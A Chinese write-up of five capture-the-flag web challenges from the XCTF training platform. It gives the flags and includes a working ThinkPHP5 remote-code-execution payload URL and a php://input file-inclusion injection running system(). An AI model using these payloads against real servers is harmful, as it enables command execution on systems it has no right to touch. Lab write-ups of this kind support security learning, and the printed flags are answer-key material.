攻防世界web进阶区1-5题 write up

攻防世界web进阶区1-5题wp

第一题:baby web

攻防世界web进阶区1-5题 write up

题目提示:想一想初始页面是哪个。F12查看,只有一个1.php的界面
攻防世界web进阶区1-5题 write up
然后把url后面的1.php去掉,可以直接得到flag
攻防世界web进阶区1-5题 write up
flag={very_baby_web}

第二题:Training-WWW-Robots

访问,出现如下的页面
攻防世界web进阶区1-5题 write up
题目的名字是Training-WWW-Robots,可能会与robots.txt协议有关,然后直接访问该协议,得到提示f10g.php
攻防世界web进阶区1-5题 write up
直接访问f10g.php页面,得到flag
攻防世界web进阶区1-5题 write up
flag=cyberpeace{6d8616f65a6c7b2925202fb6bcc124e1}

第三题:php rce

访问页面,出现以下内容
攻防世界web进阶区1-5题 write up
此为thinkphp5 rce漏洞,构造如下的payload即可
http://124.126.19.106:38036/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat ../../../flag");'
攻防世界web进阶区1-5题 write up
flag={thinkphp5_rce}

第四题:Web php include

访问,出现如下内容
攻防世界web进阶区1-5题 write up
strstr()函数:
1、搜索字符串在另一字符串中的第一次出现,该函数是二进制安全的。
2、该函数对大小写敏感。

进行php审计,构造: ?page=PHP://imput进行绕过,然后抓包发送到Repeater模块,添加<?php system("ls")?>查看文件
如图发现出现了三个文件,f14glslslsh3r3.php、index.php、phpinfo.php
攻防世界web进阶区1-5题 write up
范文这三个文件,访问f14glslslsh3r3.php时得到flag
攻防世界web进阶区1-5题 write up
flag=ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

第五题:ics-06

攻防世界web进阶区1-5题 write up
访问,出现如下页面
攻防世界web进阶区1-5题 write up
根据题目提示,点击报表中心(点击其他模块也没有反应),出现如下页面,会发现在url后边多了个id=1
攻防世界web进阶区1-5题 write up
利用burp抓包,进行**,发现当id=2333时,跟其他的返回不一样
攻防世界web进阶区1-5题 write up
然会访问id=2333,得到flag
攻防世界web进阶区1-5题 write up
flag=cyberpeace{5dad9dd3e054180406bb53d808d0565c}